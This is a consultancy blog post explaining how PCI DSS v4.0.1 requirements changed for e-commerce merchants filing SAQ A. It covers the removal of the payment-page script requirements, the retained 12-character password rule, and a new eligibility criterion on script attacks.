Payment Card Industry Data Security Standard (PCI DSS) v4 has been in effect since April 1st 2024. In June 2024, the standard was updated to v4.01 following a limited revision, though there were no new or deleted requirements in this version compared with PCI DSS v4.
These latest versions of the standard included several requirements that came into effect immediately from April 2024, such as ASV vulnerability scanning, and new future dated requirements that would come into effect at their implementation date of 31st March 2025. After this point, it would become mandatory to include them as part of an assessment.
How Have the Requirements for E-commerce Organisations Changed?
For e-commerce environments and entities that are eligible to report compliance to the requirements of SAQ A, the future-dated requirements for SAQ A included:
- 6.4.3 – Payment page scripts that are loaded and executed in the consumer’s browser are authorised and managed.
- 8.3.6 - Passwords used as authentication factors to meet Requirement 8.3.1 should be a minimum of 12 characters, containing both numbers and letters.
- 11.6.1 – A change- and tamper-detection mechanism is deployed onto payment pages.
- 12.3.1 – A targeted risk analysis is completed to support with requirement 11.6.1.
On January 30th, in response to stakeholder feedback, the PCI Security Standards Council (PCI SSC) announced an update that requirements 6.4.3, 11.6.1, and 12.3.1 will be removed from the SAQ A reporting template with effect from March 31st 2025 (the date the new future dated requirements are due to become mandatory).
It is important to note that if your compliance date is prior to March 31st 2025, the SAQ A reporting template will still contain these additional requirements, but they are able to be marked as ‘not applicable’ should they not yet be in place, without any detrimental effect to your assessment outcome. Requirement 8.3.6 will remain within SAQ A and will continue to become mandatory from March 31st 2025.
New Eligibility Criterion in the SAQ A Reporting Template
Also, from March 31st 2025, and in place of the removed requirements, an additional eligibility criterion has been added to the SAQ A reporting template, whereby merchants will need to “confirm their site is not susceptible to attacks from scripts that could affect the merchant’s e-Commerce system(s).” This means that although the specific requirements have been removed, you will still need to evidence that your e-Commerce sites (and in particular, the payment pages) operate in essence to the intent of these requirements and are secure in the same way the removed requirements had intended. As such, if you or your organisation have already commenced the process of implementing these requirements, we recommend you continue to do so in order to demonstrate compliance with the updated SAQ A eligibility criteria.
You can find more information in the full announcement released by the PCI SSC.
To discuss how these changes may affect your PCI DSS compliance going forward, please get in touch with our team.
Author
Sam Allen
Senior Lead Consultant
Sam is an experienced PCI QSA with over 15 years’ experience in cyber security consulting, law enforcement and crime prevention. She has successfully managed and consulted on numerous comprehensive projects with end-to-end support from scoping, through the assessment, and ongoing support following assessments. Sam is experienced with clients of all size, involving both smaller and larger numbers of stakeholders and locations and in various sectors including public, luxury hospitality, and large-scale retail and grocery organisations.
Blogs
